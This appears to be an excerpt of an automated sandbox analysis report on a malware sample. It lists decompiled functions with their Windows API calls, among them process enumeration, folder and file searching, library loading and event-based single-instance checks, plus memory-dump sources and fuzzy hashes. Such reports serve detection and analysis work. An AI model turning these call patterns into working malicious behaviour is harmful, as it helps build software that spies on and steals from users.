                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • CloseHandle.KERNEL32(?), ref: 02468B58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction ID: 7aafb6e89db6f48d2590e240f07cc8c35d8786e2d60381e735e40d793e1cfca5
                                            • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction Fuzzy Hash: 5E313EB1941668ABCB24DF91DC48FFEB779EB44705F10459EE50AA21A0DB306E48CF92
                                            Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                            • wsprintfA.USER32 ref: 004189E0
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                            • String ID: %dx%d
                                            • API String ID: 2716131235-2206825331
                                            • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                            • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                            Function 024CF25E Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024CF27A
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024CF293
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value___vcrt_
                                            • String ID:
                                            • API String ID: 1426506684-0
                                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction ID: 456e0cdec6dc44299a762c07ab1db81f5ee401c23998f4bb30885b108dfa9f5f
                                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction Fuzzy Hash: A801683E2086219EF76016796CC4F5B2796EB013B4B30832FE52A895E0EF56480489C0
                                            Function 02461C57 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID:
                                            • API String ID: 3407564107-0
                                            • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                            • Instruction ID: 00b8f11802350879da2f48f994a3402685e81a03bb9fbbc5a705ab0f2c9afdf1
                                            • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                            • Instruction Fuzzy Hash: 7D110774900209EFCB04DFA5D948AFDBB75AF44309F10806AE919A6250E7705B45CF56
                                            Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                            • wsprintfA.USER32 ref: 00417B83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 1243822799-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                            Function 02467D77 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 02467DA7
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467DAE
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 02467DBB
                                            • wsprintfA.USER32 ref: 02467DEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 377395780-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: 438f37cb542d8153e31358817441bc78712fa5850480272bbcc9d2e7e3f615dc
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: 59112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E2395940C7B5
                                            Function 02467E27 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 02467E5A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467E61
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 02467E74
                                            • wsprintfA.USER32 ref: 02467EAE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 3317088062-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: 00848daba5539e7869ebc0f73f214482f36b691fda80b3c4dbc9d5295b9b052f
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: F5118EB1E06228EBEB208B54DC49FA9BB78FB05711F104396F619A72C0D7745A448B56
                                            Function 02463AD0 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s
                                            • String ID:
                                            • API String ID: 3330995566-0
                                            • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction ID: 08f0fedab4db2d0ce08bcca965be1b8535233777de7ca2bb59a02be86ac7dd2a
                                            • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction Fuzzy Hash: DA112A70E0024A9FDB14DFEAD948BEEBBB9EF04B04F00805AE515BA251D7749501CF56
                                            Function 024696D7 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNEL32(02463FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,02463FA5,?), ref: 024696F3
                                            • GetFileSizeEx.KERNEL32(000000FF,02463FA5), ref: 02469710
                                            • CloseHandle.KERNEL32(000000FF), ref: 0246971E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID:
                                            • API String ID: 1378416451-0
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: e28fb5f14898db79e4da232200553939752c2c26c0d7e01f8fc2e2f292b9d3e2
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: 8FF04979E14208FBDB14DFB0EC49FAE77BAAB48711F10C656FA11A72C0E670A6018B41
                                            Function 0245A2F7 Relevance: 6.0, APIs: 4, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(004212DC), ref: 0245A2FF
                                            • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 0245A325
                                            • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 0245A33C
                                            • FreeLibrary.KERNEL32(006D70A8), ref: 0245A360
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID:
                                            • API String ID: 2256533930-0
                                            • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction ID: 1b7579a829e9de2bfd41852c5d96289d731614ceb1432b30b24f88d099409971
                                            • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction Fuzzy Hash: E9F0F9B4A0A230EFD7009B65FD48B5637A6F308745F546627F905872E1E3B45484CB26
                                            Function 02466FFA Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02466FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02466FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02467000
                                            • Sleep.KERNEL32(00001770), ref: 0246700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02467021
                                            • ExitProcess.KERNEL32 ref: 02467029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction ID: 9c7239d9bbc0d47bfba6a233743599d1bf19b6e8e1b104a9d9c66c9330de5a75
                                            • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction Fuzzy Hash: B8F05E70948216EEE720ABE0DC0CB7EBB7AFB04705F10091BB512A11D0DBB45540CE63
                                            Function 024CEE4F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 024CEE8E
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 024CEF42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction ID: e5b674561c9177c2eea362895b1ccf94111ebd5580c636e1129c9cd1deb51a2f
                                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction Fuzzy Hash: 7E41B278A00218EBCF50EF6DC894AAEBBA6BF45314F24815BE9199B391D7319911CF90
                                            Function 024CF93A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Catch
                                            • String ID: MOC$RCC
                                            • API String ID: 78271584-2084237596
                                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction ID: ab5317a3c17169c4be5292fc081615760cb331461e7e5fe00554449fd2685f5c
                                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction Fuzzy Hash: EE414975900109AFCF15CF98CD81AEEBBB6BF48304F26805EE90566621D33AA954DF51
                                            Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                            • lstrcatA.KERNEL32(?,009D06C0), ref: 004152F8
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                            • String ID: 9dA
                                            • API String ID: 2699682494-3568425128
                                            • Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                            • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                            • Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                            • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                            Function 0245BCB7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • lstrlen.KERNEL32(00000000), ref: 0245BED6
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • StrStrA.SHLWAPI(00000000,0042143C), ref: 0245BF04
                                            • lstrlen.KERNEL32(00000000), ref: 0245BFDC
                                            • lstrlen.KERNEL32(00000000), ref: 0245BFF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID:
                                            • API String ID: 1440504306-0
                                            • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction ID: d13349ae860b21203a8eb846dcad35c289ca4e8817364865cefe5472370111b1
                                            • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction Fuzzy Hash: 76B13472900628ABCB18FBA1DC59EFE773AEF14305F40456EE546B2190EF345A48CF62
                                            Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFileNextlstrcat
                                            • String ID: q?A
                                            • API String ID: 3840410801-4084695119
                                            • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                            • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                            Function 024653F7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02465431
                                            • lstrcat.KERNEL32(?,00421058), ref: 0246544E
                                            • lstrcat.KERNEL32(?,006D6FF8), ref: 02465462
                                            • lstrcat.KERNEL32(?,0042105C), ref: 02465474
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
                                              • Part of subcall function 02464DC7: FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
                                              • Part of subcall function 02464DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                              • Part of subcall function 02464DC7: FindClose.KERNEL32(000000FF), ref: 02465049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction ID: 734fbc32b868b2d7e2c134d56a1a5a616fe2d603e81483f80486105e5f9a14ec
                                            • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction Fuzzy Hash: B4218876D04218A7DB14FB70EC45EE9333E9B54300F40459BF59956190EE745ACC8FA2